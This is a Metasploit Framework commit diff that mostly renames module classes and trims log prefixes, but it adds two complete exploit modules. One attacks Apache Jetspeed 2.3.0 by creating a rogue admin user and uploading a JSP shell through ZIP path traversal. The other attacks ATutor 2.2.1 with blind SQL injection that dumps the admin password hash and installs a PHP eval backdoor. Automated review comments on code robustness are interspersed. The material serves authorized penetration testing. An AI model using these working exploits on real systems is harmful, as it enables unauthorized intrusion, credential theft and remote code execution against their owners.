@@ -102,12 +102,12 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' - vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + vprint_status("Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - no response to test") + vprint_status("no response to test") return false elsif result == 'class java.lang.Runtime' return true @@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_result(res) unless res - vprint_error("#{peer} - No response") + vprint_error("No response") return nil end unless res.code == 200 && res.body - vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index fc668215fb..2aa31da111 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 1e15976eb4..13f70050be 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT 
diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 96e8152bf5..bc14a88c60 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index 3b72a6101e..920ca81f2c 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 8fe12bb9d3..7c92f18163 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb index 171b689dbb..baf8345adb 100644 --- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb +++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp 
diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 3a910ece59..a9d22c9429 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index 9d501c7793..9f4f0f63a4 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Gdb diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 47840b548e..5054756e07 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d8f6182078..c7e6129b76 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eae0dc278f..bc94a338b3 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_status("#{peer} - The server returned: #{res.code} #{res.message}") + print_status("The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? - print_error("#{peer} - This server may not be vulnerable") + print_error("This server may not be vulnerable") else - print_status("#{peer} - Command output from the server:") + print_status("Command output from the server:") print_line(m) end end diff --git a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb new file mode 100644 index 0000000000..7f6f27ded4 --- /dev/null +++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb 
@@ -0,0 +1,226 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Jetspeed Arbitrary File Upload', + 'Description' => %q{ + This module exploits the unsecured User Manager REST API and a ZIP file + path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier + versions, to upload and execute a shell. + + Note: this exploit will create, use, and then delete a new admin user. + + Warning: in testing, exploiting the file upload clobbered the web + interface beyond repair. No workaround has been found yet. Use this + module at your own risk. No check will be implemented. + }, + 'Author' => [ + 'Andreas Lindh', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2016-0710'], + ['CVE', '2016-0709'], + ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710'] + ], + 'DisclosureDate' => 'Mar 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'win'], + 'Arch' => ARCH_JAVA, + 'Privileged' => false, + 'Targets' => [ + ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'], + ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win'] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(8080) + ]) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_warning(msg='') + super("#{peer} - #{msg}") + end + + def exploit + print_status("Creating admin user: #{username}:#{password}") + create_admin_user + # This was originally a typo... 
but we're having so much fun! + print_status('Kenny Loggins in') + kenny_loggins + print_warning('You have entered the Danger Zone') + print_status("Uploading payload ZIP: #{zip_filename}") + upload_payload_zip + print_status("Executing JSP shell: /jetspeed/#{jsp_filename}") + exec_jsp_shell + end + + def cleanup + print_status("Deleting user: #{username}") + delete_user + super + end + + # + # Exploit methods + # + + def create_admin_user + send_request_cgi( + 'method' => 'POST', + 'uri' => '/jetspeed/services/usermanager/users', + 'vars_post' => { + 'name' => username, + 'password' => password, + 'password_confirm' => password + } + ) + send_request_cgi( + 'method' => 'POST', + 'uri' => "/jetspeed/services/usermanager/users/#{username}", + 'vars_post' => { + 'user_enabled' => 'true', + 'roles' => 'admin' + } + ) + end + + def kenny_loggins + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/login/redirector' + ) + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => '/jetspeed/login/j_security_check', + 'cookie' => res.get_cookies, + 'vars_post' => { + 'j_username' => username, + 'j_password' => password + } + ) + + @cookie = res.get_cookies + end + + # Let's pretend we're mechanize + def import_file + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/portal/Administrative/site.psml', + 'cookie' => @cookie + ) + + html = res.get_html_document + import_export = html.at('//a[*//text() = "Import/Export"]/@href') + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => import_export, + 'cookie' => @cookie + ) + + html = res.get_html_document + html.at('//form[*//text() = "Import File"]/@action') + end + + def upload_payload_zip + zip = Rex::Zip::Archive.new + zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded) + + mime = Rex::MIME::Message.new + mime.add_part(zip.pack, 'application/zip', 'binary', + %Q{form-data; name="fileInput"; filename="#{zip_filename}"}) + mime.add_part('on', nil, nil, 'form-data; 
name="copyIdsOnImport"') + mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"') + + case target['Platform'] + when 'linux' + register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}") + register_files_for_cleanup("../temp/#{username}/#{zip_filename}") + when 'win' + register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}") + register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}") + end + + send_request_cgi( + 'method' => 'POST', + 'uri' => import_file, + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'cookie' => @cookie, + 'data' => mime.to_s + ) + end + + def exec_jsp_shell + send_request_cgi( + 'method' => 'GET', + 'uri' => "/jetspeed/#{jsp_filename}", + 'cookie' => @cookie + ) + end + + # + # Cleanup methods + # + + def delete_user + send_request_cgi( + 'method' => 'DELETE', + 'uri' => "/jetspeed/services/usermanager/users/#{username}" + ) + end + + # XXX: This is a hack because FileDropper doesn't delete directories + def on_new_session(session) + super + case target['Platform'] + when 'linux' + print_status("Deleting user temp directory: ../temp/#{username}") + session.shell_command_token("rm -rf ../temp/#{username}") + when 'win' + print_status("Deleting user temp directory: ..\\temp\\#{username}") + session.shell_command_token("rd /s /q ..\\temp\\#{username}") + end + end + + # + # Utility methods + # + + def username + @username ||= Rex::Text.rand_text_alpha_lower(8) + end + + def password + @password ||= Rex::Text.rand_text_alphanumeric(8) + end + + def jsp_filename + @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' + end + + def zip_filename + @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' + end + +end diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb index d5bd15e7ba..9be7e7fffd 100644 --- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb 
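Review bot: `cleanup` calls `delete_user` and discards the response, so if the DELETE fails the randomly named admin account made by `create_admin_user` stays on the tested server and the operator is not told. Capture the result in `delete_user` and warn on anything but success, e.g. `print_warning("User #{username} may still exist; remove it manually") unless res && res.code == 200` (the success code is an assumption to confirm against the API). `kenny_loggins` and `import_file` call `res.get_cookies` and `res.get_html_document` with no nil check, and `import_file` can return nil from `html.at(...)`, which `upload_payload_zip` then passes as `'uri'`. Other modules in this commit guard with `unless res` before using the response. The `print_status`/`print_warning` overrides also re-add the `#{peer} - ` prefix that the rest of this commit strips from callers, so the prefix may be printed twice if the framework now supplies it; atutor_sqli.rb has the same overrides.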
+++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 7c34f04663..67afb643ef 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,8 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote append = 'false' jar = payload.encoded_jar.pack - File.open("/tmp/#{@payload_exe}", "wb") do |f| f.write(jar) end - chunk_length = 384 # 512 bytes when base64 encoded parts = jar.chars.each_slice(chunk_length).map(&:join) diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 6b2f6d616e..0ca04d25f8 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), 
@@ -96,11 +96,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end end diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb new file mode 100644 index 0000000000..693c045c1c --- /dev/null +++ b/modules/exploits/multi/http/atutor_sqli.rb 
@@ -0,0 +1,272 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', + 'Description' => %q{ + This module exploits a SQL Injection vulnerability and an authentication weakness + vulnerability in ATutor. This essentially means an attacker can bypass authentication + and reach the administrator's interface where they can upload malicious code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code + ], + 'References' => + [ + [ 'CVE', '2016-2555' ], + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-08/' ] # Advisory + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']) + ],self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def check + # the only way to test if the target is vuln + if test_injection + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def create_zip_file + zip_file = Rex::Zip::Archive.new + @header = Rex::Text.rand_text_alpha_upper(4) + @payload_name = Rex::Text.rand_text_alpha_lower(4) + @plugin_name = Rex::Text.rand_text_alpha_lower(3) + + path = 
"#{@plugin_name}/#{@payload_name}.php" + # this content path is where the ATutor authors recommended installing it + register_file_for_cleanup("#{@payload_name}.php", "/var/content/module/#{path}") + zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") + zip_file.pack + end + + def exec_code + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"), + 'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n" + }, 0.1) + end + + def upload_shell(cookie) + post_data = Rex::MIME::Message.new + post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"") + data = post_data.to_s + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => cookie + }) + + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection), + 'cookie' => cookie + }) + if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"), + 'cookie' => cookie + }) + return true + end + end + # unknown failure... 
+ fail_with(Failure::Unknown, "Unable to upload php code") + return false + end + + def login(username, hash) + password = Rex::Text.sha1(hash) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "login.php"), + 'vars_post' => { + 'form_password_hidden' => password, + 'form_login' => username, + 'submit' => 'Login', + 'token' => '' + }, + }) + # poor developer practices + cookie = "ATutorID=#{$4};" if res.get_cookies =~ /ATutorID=(.*); ATutorID=(.*); ATutorID=(.*); ATutorID=(.*);/ + if res && res.code == 302 && res.redirection.to_s.include?('admin/index.php') + # if we made it here, we are admin + report_cred(user: username, password: hash) + return cookie + end + # auth failed if we land here, bail + fail_with(Failure::NoAccess, "Authentication failed with username #{username}") + return nil + end + + def perform_request(sqli) + # the search requires a minimum of 3 chars + sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='" + rand_key = Rex::Text.rand_text_alpha(1) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "index_public.php"), + 'vars_post' => { + "search_friends_#{rand_key}" => sqli, + 'rand_key' => rand_key, + 'search' => 'Search' + }, + }) + return res.body + end + + def dump_the_hash + extracted_hash = "" + sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" + login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli).to_i + for i in 1..login_and_hash_length + sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" + asciival = generate_sql_and_test(false, false, sqli) + if asciival >= 0 + extracted_hash << asciival.chr + end + end + return extracted_hash.split(":") + end + + # greetz to rsauron & the darkc0de crew! 
+ def get_ascii_value(sql) + lower = 0 + upper = 126 + while lower < upper + mid = (lower + upper) / 2 + sqli = "#{sql}>#{mid}" + result = perform_request(sqli) + if result =~ /There are \d+ entries\./ + lower = mid + 1 + else + upper = mid + end + end + if lower > 0 and lower < 126 + value = lower + else + sqli = "#{sql}=#{lower}" + result = perform_request(sqli) + if result =~ /There are \d+ entries\./ + value = lower + end + end + return value + end + + def generate_sql_and_test(do_true=false, do_test=false, sql=nil) + if do_test + if do_true + result = perform_request("1=1") + if result =~ /There are \d+ entries\./ + return true + end + else not do_true + result = perform_request("1=2") + if not result =~ /There are \d+ entries\./ + return true + end + end + elsif not do_test and sql + return get_ascii_value(sql) + end + end + + def test_injection + if generate_sql_and_test(do_true=true, do_test=true, sql=nil) + if generate_sql_and_test(do_true=false, do_test=true, sql=nil) + return true + end + end + return false + end + + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + private_type: :nonreplayable_hash, + jtr_format: 'sha512', + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + + def exploit + print_status("Dumping the username and password hash...") + credz = dump_the_hash + if credz + print_good("Got the #{credz[0]}'s hash: #{credz[1]} !") + admin_cookie = login(credz[0], credz[1]) + if upload_shell(admin_cookie) + exec_code + end + end + end +end 
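Review bot: In `login`, `res.get_cookies` is evaluated on the line before the `if res && res.code == 302` guard, so a missing response raises NoMethodError instead of reaching `fail_with`; `perform_request` has the same gap with `return res.body`. Moving the cookie match inside the guarded branch and returning `res ? res.body : ''` from `perform_request` would fix both. `get_ascii_value` leaves `value` nil when neither branch matches, and `dump_the_hash` then evaluates `asciival >= 0` on nil; `next if asciival.nil?` before the comparison avoids that. In `report_cred` the hash literal sets `private_type` twice (`:password`, then `:nonreplayable_hash`); Ruby keeps only the last and warns, so the first entry should be removed. `jtr_format: 'sha512'` should also be checked against the stored hash type, which this file does not establish, so that the recorded credential is labelled correctly.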
diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index b7017589ee..392ffc6c62 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), @@ -86,14 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end - print_status("#{peer} - Requesting '#{php_fname}'...") + print_status("Requesting '#{php_fname}'...") res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index ca192f495c..762484a328 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index ec8b0b4797..810c5a1234 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb 
+++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), @@ -130,17 +130,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Bolt.") + vprint_good("Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? - vprint_good("#{peer} - Token \"#{token}\" found.") + vprint_good("Token \"#{token}\" found.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), 
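Review bot: The first line of `exploit` in the `@@ -130,17` hunk writes the cleartext password to verbose output with `vprint_status("Authenticating using #{username}:#{password}")`. Console output is commonly spooled to log files or pasted into reports, so the credential ends up stored outside the datastore. Logging only the account name is enough to trace the step: `vprint_status("Authenticating as #{username}")`. The body of `exploit` continues past the end of this hunk.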
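Review bot: The upload request in the `@@ -148,7` hunk builds its URI with `normalize_uri(target_uri, 'bolt', 'files', 'theme', fname)`, passing the URI object itself. The login request and `payload_url` in the same file pass `target_uri.path`. It may work through implicit string conversion, but the behaviour then depends on how `normalize_uri` treats a non-string argument. For consistency use `normalize_uri(target_uri.path, 'bolt', 'files', 'theme', fname)`. The enclosing `send_request_cgi` call is cut off at the end of the hunk.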
@@ -158,17 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_file_name) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 03028e468b..41592806fa 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") http_send_command(payload.raw) end end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index a0c6b0f4c6..78267b571c 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
